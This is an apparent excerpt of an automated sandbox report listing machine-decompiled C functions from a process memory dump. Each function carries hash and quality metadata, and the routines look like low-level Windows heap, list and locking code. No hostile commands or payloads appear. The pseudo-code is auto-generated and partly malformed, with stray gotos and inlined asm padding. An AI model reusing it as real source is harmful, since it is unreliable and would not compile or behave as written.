                        				_t18 = _t37 + 8;
                        				_t33 =  *_t18;
                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                        					L8:
                        					_push(3);
                        					asm("int 0x29");
                        				} else {
                        					 *_t27 = _t33;
                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                        					_t35 = 0x2be87e4;
                        					_t18 =  *0x2be87e0; // 0x0
                        					while(_t18 != 0) {
                        						_t43 = _t18 -  *0x2be5cd0; // 0xffffffff
                        						if(_t43 >= 0) {
                        							_t31 =  *0x2be87e4; // 0x0
                        							_t18 =  *_t31;
                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                        								goto L8;
                        							} else {
                        								 *0x2be87e4 = _t18;
                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                        								L02AF7055(_t31 + 0xfffffff8);
                        								_t24 =  *0x2be87e0; // 0x0
                        								_t18 = _t24 - 1;
                        								 *0x2be87e0 = _t18;
                        								continue;
                        							}
                        						}
                        						goto L9;
                        					}
                        				}
                        				L9:
                        				__eflags =  *0x2be5cd0;
                        				if( *0x2be5cd0 <= 0) {
                        					L02AF7055(_t37);
                        				} else {
                        					_t30 = _t37 + 8;
                        					_t34 =  *0x2be87e8; // 0x0
                        					__eflags =  *_t34 - _t35;
                        					if( *_t34 != _t35) {
                        						goto L8;
                        					} else {
                        						 *_t30 = _t35;
                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                        						 *_t34 = _t30;
                        						 *0x2be87e8 = _t30;
                        						 *0x2be87e0 = _t18 + 1;
                        					}
                        				}
                        				 *(_t38 - 4) = 0xfffffffe;
                        				return E02B4D0D1(L02B84320());
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3672afe96eae1594ba1e875c223af3f74c3b48c179fbe4f5a32e440c186fe77e
                        • Instruction ID: f6b75a1cc170639a80c37de392420e756db6ef4e9e9bd58dfd08fa7076af26e5
                        • Opcode Fuzzy Hash: 3672afe96eae1594ba1e875c223af3f74c3b48c179fbe4f5a32e440c186fe77e
                        • Instruction Fuzzy Hash: FD216A70990A06CFCB25EF64D140B14BBF2FB85394B508AEED1498F2A0EB35D491CF02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 25%
                        			E02B22397(intOrPtr _a4) {
                        				void* __ebx;
                        				void* __ecx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t11;
                        				void* _t19;
                        				void* _t25;
                        				void* _t26;
                        				intOrPtr _t27;
                        				void* _t28;
                        				void* _t29;
                        
                        				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                        				if( *0x2be848c != 0) {
                        					L02B1FAD0(0x2be8610);
                        					if( *0x2be848c == 0) {
                        						E02B1FA00(0x2be8610, _t19, _t27, 0x2be8610);
                        						goto L1;
                        					} else {
                        						_push(0);
                        						_push(_a4);
                        						_t26 = 4;
                        						_t29 = E02B22581(0x2be8610, 0x2ad50a0, _t26, _t27, _t28);
                        						E02B1FA00(0x2be8610, 0x2ad50a0, _t27, 0x2be8610);
                        					}
                        				} else {
                        					L1:
                        					_t11 =  *0x2be8614; // 0x0
                        					if(_t11 == 0) {
                        						_t11 = E02B34886(0x2ad1088, 1, 0x2be8614);
                        					}
                        					_push(0);
                        					_push(_a4);
                        					_t25 = 4;
                        					_t29 = E02B22581(0x2be8610, (_t11 << 4) + 0x2ad5070, _t25, _t27, _t28);
                        				}
                        				if(_t29 != 0) {
                        					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                        					 *((char*)(_t29 + 0x40)) = 0;
                        				}
                        				return _t29;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: affda517443fb58306b36e3a2e792b8ebc94f50b7d5cd60a2c824a8735e076e4
                        • Instruction ID: 2a041ff880f7f57b6fcf4b961c8d1253b7359cb14cf6e708d25a9b6682ec4b9a
                        • Opcode Fuzzy Hash: affda517443fb58306b36e3a2e792b8ebc94f50b7d5cd60a2c824a8735e076e4
                        • Instruction Fuzzy Hash: 2D114872640710AFD720AA29AD40B26B399EF50750F488496FA0EDB2A0CA74E849CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02B746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                        				signed short* _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				signed int _t22;
                        				signed char _t23;
                        				short _t32;
                        				void* _t38;
                        				char* _t40;
                        
                        				_v12 = __edx;
                        				_t29 = 0;
                        				_v8 = __ecx;
                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                        				_t38 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                        				if(_t38 != 0) {
                        					_t40 = _a4;
                        					 *_t40 = 1;
                        					E02B3F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                        					_t22 = _v12 >> 1;
                        					_t32 = 0x2e;
                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                        					_t23 = E02B2D268(_t38, 1);
                        					asm("sbb al, al");
                        					 *_t40 =  ~_t23 + 1;
                        					L02B177F0(_v16, 0, _t38);
                        				} else {
                        					 *_a4 = 0;
                        					_t29 = 0xc0000017;
                        				}
                        				return _t29;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 7b740599473fe5707e59a91a188bae729a95e4dbb8b7728ee7ff84d5b9456fa9
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: D011E572904208BFC7059F5CD8809BEB7BAEF99304F1080AEF984C7350DA318D55D7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 42%
                        			E02AFC962(char __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t19;
                        				char _t22;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				char _t32;
                        				char _t34;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t38;
                        				signed int _t39;
                        
                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                        				_v8 =  *0x2bed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                        				_t34 = __ecx;
                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                        					_t26 = 0;
                        					E02B0EEF0(0x2be70a0);
                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                        					if(E02B7F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                        						L9:
                        						E02B0EB70(_t29, 0x2be70a0);
                        						_t19 = _t26;
                        						L2:
                        						_pop(_t35);
                        						_pop(_t37);
                        						_pop(_t27);
                        						return E02B3B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                        					}
                        					_t29 = _t34;
                        					_t26 = E02B7F1FC(_t34, _t32);
                        					if(_t26 < 0) {
                        						goto L9;
                        					}
                        					_t38 =  *0x2be70c0; // 0x0
                        					while(_t38 != 0x2be70c0) {
                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                        						_t38 =  *_t38;
                        						_v12 = _t22;
                        						if(_t22 != 0) {
                        							_t29 = _t22;
                        							 *0x2beb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                        							_v12();
                        						}
                        					}
                        					goto L9;
                        				}
                        				_t19 = 0;
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7337b0f5bc684e9176d7e612098e03502ed6718350e7930051373e379e8bc436
                        • Instruction ID: c46ed0cab4d85fe1c2681479ff6cfb5c8f5dc113731f7e6917aab4dfc71a0aee
                        • Opcode Fuzzy Hash: 7337b0f5bc684e9176d7e612098e03502ed6718350e7930051373e379e8bc436
                        • Instruction Fuzzy Hash: F611E5317106069BDB10AF28DC89A3BF7E7FF84658B0009A9F94687651DF28ED50EBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E02B337F5(void* __ecx, intOrPtr* __edx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t6;
                        				intOrPtr _t13;
                        				intOrPtr* _t20;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				intOrPtr* _t29;
                        
                        				_t27 = __edx;
                        				_t28 = __ecx;
                        				if(__edx == 0) {
                        					E02B12280(_t6, 0x2be8550);
                        				}
                        				_t29 = E02B3387E(_t28);
                        				if(_t29 == 0) {
                        					L6:
                        					if(_t27 == 0) {
                        						E02B0FFB0(0x2be8550, _t27, 0x2be8550);
                        					}
                        					if(_t29 == 0) {
                        						return 0xc0000225;
                        					} else {
                        						if(_t27 != 0) {
                        							goto L14;
                        						}
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                        						goto L11;
                        					}
                        				} else {
                        					_t13 =  *_t29;
                        					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                        						L13:
                        						_push(3);
                        						asm("int 0x29");
                        						L14:
                        						 *_t27 = _t29;
                        						L11:
                        						return 0;
                        					}
                        					_t20 =  *((intOrPtr*)(_t29 + 4));
                        					if( *_t20 != _t29) {
                        						goto L13;
                        					}
                        					 *_t20 = _t13;
                        					 *((intOrPtr*)(_t13 + 4)) = _t20;
                        					asm("btr eax, ecx");
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b9187929bbea023e2d790269ed7f92b18fea9c240c45f755f6c66fce36b4f20
                        • Instruction ID: da39309d5566df1de04d8244adc869802eac10d2b686f2fa5a8b71fa1fc56bec
                        • Opcode Fuzzy Hash: 9b9187929bbea023e2d790269ed7f92b18fea9c240c45f755f6c66fce36b4f20
                        • Instruction Fuzzy Hash: 5601B5B2A41610ABC3378B1AD940F2BBBE7DF85B60B1544EDE9498B311DB34E841CBD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B2002D() {
                        				void* _t11;
                        				char* _t14;
                        				signed char* _t16;
                        				char* _t27;
                        				signed char* _t29;
                        
                        				_t11 = E02B17D50();
                        				_t27 = 0x7ffe0384;
                        				if(_t11 != 0) {
                        					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t14 = 0x7ffe0384;
                        				}
                        				_t29 = 0x7ffe0385;
                        				if( *_t14 != 0) {
                        					if(E02B17D50() == 0) {
                        						_t16 = 0x7ffe0385;
                        					} else {
                        						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t16 & 0x00000040) != 0) {
                        						goto L18;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(E02B17D50() != 0) {
                        						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					if( *_t27 != 0) {
                        						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						if(E02B17D50() != 0) {
                        							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        						}
                        						if(( *_t29 & 0x00000020) == 0) {
                        							goto L5;
                        						}
                        						L18:
                        						return 1;
                        					} else {
                        						L5:
                        						return 0;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: 2c077b5592c960acfce24d8510e3ebc117e12d39618ee6f7ec189f6123ad4ff9
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: 62112676601B968FE732AB28C948B367BF5EF41758F0D04E0DD0887692DB2CC841C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02B0766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				char _v8;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr _t29;
                        				intOrPtr* _t30;
                        				void* _t42;
                        				intOrPtr _t47;
                        
                        				_push(__ecx);
                        				_t36 =  &_v8;
                        				if(E02B2F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                        					L10:
                        					_t22 = 0;
                        				} else {
                        					_t24 = _v8 + __ecx;
                        					_t42 = _t24;
                        					if(_t24 < __ecx) {
                        						goto L10;
                        					} else {
                        						if(E02B2F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                        							goto L10;
                        						} else {
                        							_t29 = _v8 + _t42;
                        							if(_t29 < _t42) {
                        								goto L10;
                        							} else {
                        								_t47 = _t29;
                        								_t30 = _a16;
                        								if(_t30 != 0) {
                        									 *_t30 = _t47;
                        								}
                        								if(_t47 == 0) {
                        									goto L10;
                        								} else {
                        									_t22 = L02B14620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t22;
                        			}











                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 46a965bcb2d63f411bc6bbf7fb71e61d3f2be0c6e191b94b6e898fdbbc62e132
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: CB018872700119ABC7219E9EDD81E5BFBADEB84764B1445A4B909CF290DE31ED01E7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02AF9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                        				intOrPtr* _t51;
                        				intOrPtr _t59;
                        				signed int _t64;
                        				signed int _t67;
                        				signed int* _t71;
                        				signed int _t74;
                        				signed int _t77;
                        				signed int _t82;
                        				intOrPtr* _t84;
                        				void* _t85;
                        				intOrPtr* _t87;
                        				void* _t94;
                        				signed int _t95;
                        				intOrPtr* _t97;
                        				signed int _t99;
                        				signed int _t102;
                        				void* _t104;
                        
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t97 = __ecx;
                        				_t102 =  *(__ecx + 0x14);
                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                        					_t102 = _t102 | 0x000007d0;
                        				}
                        				_t48 =  *[fs:0x30];
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        					_t102 = _t102 & 0xff000000;
                        				}
                        				_t80 = 0x2be85ec;
                        				E02B12280(_t48, 0x2be85ec);
                        				_t51 =  *_t97 + 8;
                        				if( *_t51 != 0) {
                        					L6:
                        					return E02B0FFB0(_t80, _t97, _t80);
                        				} else {
                        					 *(_t97 + 0x14) = _t102;
                        					_t84 =  *0x2be538c; // 0x77f06848
                        					if( *_t84 != 0x2be5388) {
                        						_t85 = 3;
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c);
                        						_push(0x2bcf6e8);
                        						E02B4D0E8(0x2be85ec, _t97, _t102);
                        						 *((char*)(_t104 - 0x1d)) = 0;
                        						_t99 =  *(_t104 + 8);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							L13:
                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        							if(__eflags == 0) {
                        								E02BC88F5(_t80, _t85, 0x2be5388, _t99, _t102, __eflags);
                        							}
                        						} else {
                        							__eflags = _t99 -  *0x2be86c0; // 0x6007b0
                        							if(__eflags == 0) {
                        								goto L13;
                        							} else {
                        								__eflags = _t99 -  *0x2be86b8; // 0x0
                        								if(__eflags == 0) {
                        									goto L13;
                        								} else {
                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        									__eflags =  *((char*)(_t59 + 0x28));
                        									if( *((char*)(_t59 + 0x28)) == 0) {
                        										E02B12280(_t99 + 0xe0, _t99 + 0xe0);
                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                        										__eflags =  *((char*)(_t99 + 0xe5));
                        										if(__eflags != 0) {
                        											E02BC88F5(0x2be85ec, _t85, 0x2be5388, _t99, _t102, __eflags);
                        										} else {
                        											__eflags =  *((char*)(_t99 + 0xe4));
                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                        												 *((char*)(_t99 + 0xe4)) = 1;
                        												_push(_t99);
                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                        												E02B3AFD0();
                        											}
                        											while(1) {
                        												_t71 = _t99 + 8;
                        												 *(_t104 - 0x2c) = _t71;
                        												_t80 =  *_t71;
                        												_t95 = _t71[1];
                        												 *(_t104 - 0x28) = _t80;
                        												 *(_t104 - 0x24) = _t95;
                        												while(1) {
                        													L19:
                        													__eflags = _t95;
                        													if(_t95 == 0) {
                        														break;
                        													}
                        													_t102 = _t80;
                        													 *(_t104 - 0x30) = _t95;
                        													 *(_t104 - 0x24) = _t95 - 1;
                        													asm("lock cmpxchg8b [edi]");
                        													_t80 = _t102;
                        													 *(_t104 - 0x28) = _t80;
                        													 *(_t104 - 0x24) = _t95;
                        													__eflags = _t80 - _t102;
                        													_t99 =  *(_t104 + 8);
                        													if(_t80 != _t102) {
                        														continue;
                        													} else {
                        														__eflags = _t95 -  *(_t104 - 0x30);
                        														if(_t95 !=  *(_t104 - 0x30)) {
                        															continue;
                        														} else {
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																_t74 = 0;
                        																 *(_t104 - 0x34) = 0;
                        																_t102 = 0;
                        																__eflags = 0;
                        																while(1) {
                        																	 *(_t104 - 0x3c) = _t102;
                        																	__eflags = _t102 - 3;
                        																	if(_t102 >= 3) {
                        																		break;
                        																	}
                        																	__eflags = _t74;
                        																	if(_t74 != 0) {
                        																		L49:
                        																		_t102 =  *_t74;
                        																		__eflags = _t102;
                        																		if(_t102 != 0) {
                        																			_t102 =  *(_t102 + 4);
                        																			__eflags = _t102;
                        																			if(_t102 != 0) {
                        																				 *0x2beb1e0(_t74, _t99);
                        																				 *_t102();
                        																			}
                        																		}
                        																		do {
                        																			_t71 = _t99 + 8;
                        																			 *(_t104 - 0x2c) = _t71;
                        																			_t80 =  *_t71;
                        																			_t95 = _t71[1];
                        																			 *(_t104 - 0x28) = _t80;
                        																			 *(_t104 - 0x24) = _t95;
                        																			goto L19;
                        																		} while (_t74 == 0);
                        																		goto L49;
                        																	} else {
                        																		_t82 = 0;
                        																		__eflags = 0;
                        																		while(1) {
                        																			 *(_t104 - 0x38) = _t82;
                        																			__eflags = _t82 -  *0x2be84c0;
                        																			if(_t82 >=  *0x2be84c0) {
                        																				break;
                        																			}
                        																			__eflags = _t74;
                        																			if(_t74 == 0) {
                        																				_t77 = E02BC9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                        																				__eflags = _t77;
                        																				if(_t77 == 0) {
                        																					_t74 = 0;
                        																					__eflags = 0;
                        																				} else {
                        																					_t74 = _t77 + 0xfffffff4;
                        																				}
                        																				 *(_t104 - 0x34) = _t74;
                        																				_t82 = _t82 + 1;
                        																				continue;
                        																			}
                        																			break;
                        																		}
                        																		_t102 = _t102 + 1;
                        																		continue;
                        																	}
                        																	goto L20;
                        																}
                        																__eflags = _t74;
                        															}
                        														}
                        													}
                        													break;
                        												}
                        												L20:
                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                        												 *((char*)(_t99 + 0xe5)) = 1;
                        												 *((char*)(_t104 - 0x1d)) = 1;
                        												goto L21;
                        											}
                        										}
                        										L21:
                        										 *(_t104 - 4) = 0xfffffffe;
                        										E02AF922A(_t99);
                        										_t64 = E02B17D50();
                        										__eflags = _t64;
                        										if(_t64 != 0) {
                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        										} else {
                        											_t67 = 0x7ffe0386;
                        										}
                        										__eflags =  *_t67;
                        										if( *_t67 != 0) {
                        											_t67 = E02BC8B58(_t99);
                        										}
                        										__eflags =  *((char*)(_t104 - 0x1d));
                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                        											__eflags = _t99 -  *0x2be86c0; // 0x6007b0
                        											if(__eflags != 0) {
                        												__eflags = _t99 -  *0x2be86b8; // 0x0
                        												if(__eflags == 0) {
                        													_t94 = 0x2be86bc;
                        													_t87 = 0x2be86b8;
                        													goto L27;
                        												} else {
                        													__eflags = _t67 | 0xffffffff;
                        													asm("lock xadd [edi], eax");
                        													if(__eflags == 0) {
                        														E02AF9240(_t80, _t99, _t99, _t102, __eflags);
                        													}
                        												}
                        											} else {
                        												_t94 = 0x2be86c4;
                        												_t87 = 0x2be86c0;
                        												L27:
                        												E02B29B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                        											}
                        										}
                        									} else {
                        										goto L13;
                        									}
                        								}
                        							}
                        						}
                        						return E02B4D130(_t80, _t99, _t102);
                        					} else {
                        						 *_t51 = 0x2be5388;
                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                        						 *_t84 = _t51;
                        						 *0x2be538c = _t51;
                        						goto L6;
                        					}
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 303a3f8ca66cdfcbd7a3ebd7cd65bccbca437dd4151e171c241b1961c43afa4a
                        • Instruction ID: 639a246899ab0cbe6c39578bab393d6bc7f419984cfdc20a91397249baeae339
                        • Opcode Fuzzy Hash: 303a3f8ca66cdfcbd7a3ebd7cd65bccbca437dd4151e171c241b1961c43afa4a
                        • Instruction Fuzzy Hash: C801A472A01605CFC7659F54D880B17BBF9EB45324F258066E6068FB91CB78DC41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02B8C450(intOrPtr* _a4) {
                        				signed char _t25;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t26 = _a4;
                        				_t25 =  *(_t26 + 0x10);
                        				if((_t25 & 0x00000003) != 1) {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					_push(0);
                        					_push( *_t26);
                        					E02B39910();
                        					_t25 =  *(_t26 + 0x10);
                        				}
                        				if((_t25 & 0x00000001) != 0) {
                        					_push(4);
                        					_t7 = _t26 + 4; // 0x4
                        					_t27 = _t7;
                        					_push(_t27);
                        					_push(5);
                        					_push(0xfffffffe);
                        					E02B395B0();
                        					if( *_t27 != 0) {
                        						_push( *_t27);
                        						E02B395D0();
                        					}
                        				}
                        				_t8 = _t26 + 0x14; // 0x14
                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                        				}
                        				_push( *_t26);
                        				E02B395D0();
                        				return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                        			}







                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: 6dba459b51ab925bea2aef627e562109b0d7a67dea04117733f3517eb69f758f
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: 3E0192B2140A05BFD726AF65CC80E62FB6EFF54794F554565F21443560CB61ACE0CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02BC4015(signed int __eax, signed int __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t10;
                        				signed int _t28;
                        
                        				_push(__ecx);
                        				_t28 = __ecx;
                        				asm("lock xadd [edi+0x24], eax");
                        				_t10 = (__eax | 0xffffffff) - 1;
                        				if(_t10 == 0) {
                        					_t1 = _t28 + 0x1c; // 0x1e
                        					E02B12280(_t10, _t1);
                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        					E02B12280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2be86ac);
                        					E02AFF900(0x2be86d4, _t28);
                        					E02B0FFB0(0x2be86ac, _t28, 0x2be86ac);
                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                        					E02B0FFB0(0, _t28, _t1);
                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                        					}
                        					_t10 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        				}
                        				return _t10;
                        			}








                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83842076584d6b761d2a0f0a472c25fa4eab18ccbe9bb8b0a5b895287815d0c7
                        • Instruction ID: b66a07a6b62bbff5398aa263e65b0d521e7b7c9e1fd0930844ebb88a37d305cc
                        • Opcode Fuzzy Hash: 83842076584d6b761d2a0f0a472c25fa4eab18ccbe9bb8b0a5b895287815d0c7
                        • Instruction Fuzzy Hash: 2E01A2723419457FD621AB79CE80E17F7ADFF45760B0002A9F50883A61CF24EC11CAE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02BB138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
